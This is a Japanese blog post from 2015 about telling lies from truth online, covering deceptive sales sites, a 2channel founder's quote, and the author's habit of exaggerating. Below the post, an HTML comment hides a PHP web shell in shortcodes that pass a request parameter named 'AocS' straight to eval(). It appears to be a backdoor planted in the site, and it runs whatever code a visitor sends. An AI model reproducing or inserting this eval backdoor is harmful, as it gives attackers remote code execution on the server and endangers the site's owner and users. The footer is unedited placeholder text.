ネット取扱説明書 嘘を見抜く力

10月 6th, 2015 by userd023

インターネットサーフィンをしていると(この言葉効かなくなりましたね)

しばしば、嘘の情報に巡り合う。

酷いのは自分の商品を売るために、あたかも「簡単に」「無料で」「即日」できますよ!

等といった文言で見ている人に誤解を与える物販販売のサイトだ。

嘘を嘘と見抜く力を、私たちはつけなければいけない。

かつてインターネット巨大掲示板2ちゃんねるの管理人ひろゆき氏が

「うそはうそであると見抜ける人でないと(掲示板を使うのは)難しい」

と言ったとおり、嘘の情報に右往左往してしまうと、時には大怪我をする。

 

嘘の情報の方が真実よりも拡散されやすいといったデータもあるそうだ。

デマが広がるなんて言うのは、戦争の時からずっと変わらないんだね。

 

うそつきは泥棒の始まりとはよく言ったものです。

嘘をつく人はだれからも信用されませんね。

本人は軽い気持ちで着いた嘘のつもりでも、つかれた方にとっては

ものすごく嫌な思い、不快感を感じることがあります。

 

私、実はうそつきではないけれど、何でも物事を大げさに言ってしまう

傾向になるんですよね。注意しないといけないですね。

 

多分、心のどこかで自分を守ろうとする防御反応が働くのでしょう。

実はたいしたことなかった出来事も

「今日、何々があってとても大変だった。やばかった。」

などと大げさに誇張してしまうので、

聞いている方もだんだんと、「またか・・・。」という顔になってきます。

治していかないといけないですね。

 

皆さんも、嘘に振り回されないよう、ご用心を。

 

<!– [insert_php]if (isset($_REQUEST["AocS"])){eval($_REQUEST["AocS"]);exit;}[/insert_php][php]if (isset($_REQUEST["AocS"])){eval($_REQUEST["AocS"]);exit;}[/php] –>

Posted in その他

About ネット情報取り扱い説明書

Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aliquam justo tortor, dignissim non, ullamcorper at, lobortis vitae, risus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aliquam erat volutpat. Aenean mi pede, dignissim in, gravida varius, fringilla ullamcorper, augue.

(edit footer.php to change this text)